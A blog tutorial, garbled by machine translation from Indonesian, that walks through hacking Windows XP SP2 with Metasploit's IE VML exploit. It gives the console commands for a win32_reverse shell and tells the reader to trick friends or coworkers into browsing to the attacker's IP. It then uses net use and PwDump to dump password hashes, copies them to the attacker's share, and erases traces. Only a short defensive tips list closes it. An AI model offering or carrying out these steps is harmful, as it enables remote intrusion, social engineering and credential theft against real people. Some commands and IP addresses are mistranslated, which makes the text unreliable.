Study Hack Yuck! (3) - Hack Windows XP SP2

After knowing a few basic concepts and the 'standard' about the hack that first discussed the material and know little about the exploit in the second section, we now directly aja practice. Here I deliberately use VMWare to do the simulation, because not all people can mempraktekannya in a network. By using VMWare, we can simulate a simple network that seems to have a network consisting of our own computer and other computers. For those who can not use VMWare, try searching diinternet! Operating System that I use is Windows XP SP2.

Tools that I use is to do the Metasploit Framework exploit and to take PwDump6 hash file from the target computer. What is the Metasploit Framework?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, research, and Vulnerability.

For more information about the use of Metasploit, you can read dokomentasi also included in the installation. To install metasploit version 2.7, users needed administrator. I try to install with a 'limited user', but once installed can not run. Actual installation metasploit just unpack this file only. So you can install without having to get the admin user and put it anywhere without having to install in the Program Files folder. However, after a little dioprek, apparently does not need the admin can run. Ribet slightly and Reviews males do here, soalnya when trying the latest version, the version 3 Beta 3, we can run it without having to install the admin user. Gitu aja ko busy! Moreover version 3 (skarang msh beta) feature more cool and more. But unfortunately for msfweb (version webnya) has not been able to run fully.

Ok .. now I assume you have read the userguide metasploit (ah.. I most incorrect assumption; p). Let cool and more plasticity to understand the details, I explain metasplooit using the console (mfsconsole) only. Metasploit using cygwin to run it, because it made use metasploit Perl. Now let us praktekkan!

first run 'mfsconsole'!

Command to learn what is in the MSFConsole use the command 'help'.

Because the computer that you want to be a target is Windows XP SP2, then use the exploit affecting XP SP2 is to exploit weaknesses in Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution Vulnerability in Microsoft Internet Explorer using a buffer overflow in the processing VML code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

To view the info from this exploit use the command:

MSF> ie_vml_rectfill info

Exploit ie_vml_rectfill exploit weaknesses in Internet Explorer. Therefore, this exploit will have an impact if the target machine to run IE and direct url to the computer to its attacker. For that, we must use a little 'social engineering', as if in kost / lab / office to us is our friends that we are trying to make the latest web application, and have seen how to use IE to an IP address (or computer name) us. Suppose http://192.168.186.1. Usually after this exploit is executed and the target computer has been connected, then IE will crash. Leave some time to exploit the 'work'. After some time aja bilang "wah .. I have error. Ok deh .. betulin my first try ... makasih ya. " New IE close its a Task Manager (even if a CE, IE in msh hard-kill, not to forget me-'end process'-kan 'dumpred.exe' also, but after the exploit work:-D).


To exploit the use perintah2 following in console:

MSF> use_ie_vml_rectfill

MSF> set payload win32_reverse

MSF> set RHOST ip_target

MSF> set LHOST ip_attacker

MSF> exploit

The result will look like the image below:


In the example above, the target computer's IP (RHOST) is 192168186128, whereas the computer attacker (LHOST) is 192.168.186.1. And the 'payload' is used 'win32_reverse' PORT and HTTP is 80 (default http port). After running the command 'exploit', we have a new target machine to run IE and its direct url to our computer. This process will take some time, even sometimes not successful. So try and hold aja:-D

If you are successful, then you will get the 'cmd.exe' from the target computer.

Crack Password!

Well, after we 'control' the target computer, skalian aja password we see it. How similar to my previous article about Win XP SP2 Hack Password, but because it is remote, we must 'provide' program that is required PwDump. To be successful this way, I assume on the target computer users who are logged in have access to admin. I used a computer user who used the target is only IE user 'normal', pwdump will not succeed!

First we used to share PwDump from our computer with full access so that we can upload the dump target computer password, but ending with '$' though not visible public computer. Suppose the name of the folder in the share PwDump $. Then from the console that was successful dihack, take PwDump with the Map Network Drive from the computer with our 'net use'. Examples of commands used



After that Pwdump copy to the target computer in the temporary folder, 'temp'. After successful in-Pwdump copy to the target computer, run the command Pwdump

C: \ temp \ Pwdump-o pass.txt 127.0.0.1

How successful will appear in the image below.

Then copy the files to the computer we pass.txt

C: \ temp \ copy pass.txt z:

And last, do not leave the impression that we have come by over there.

Nah, I can be a result of its files. Living in the crack only .... (see previous article for nge-crack password).

In fact many can dioprek from metasploit. Metasploit in many exploit, payload, meterpreter, etc. a very 'fun' to dioprek. To learn metasploit, disitusnya there is documentation of the rather good.

Happy Hacking ... ..



Some suggestions so that we remain safe windows to exploit above.

1. Do not use Internet Explorer. Use Mozilla Firefox or Opera.

2. Patch your Windows.

3. Use anti-virus with latest update

4. heart2 friend of your own .. alert!


What's on Your Mind...

My Blog List

Followers

guest book


ShoutMix chat widget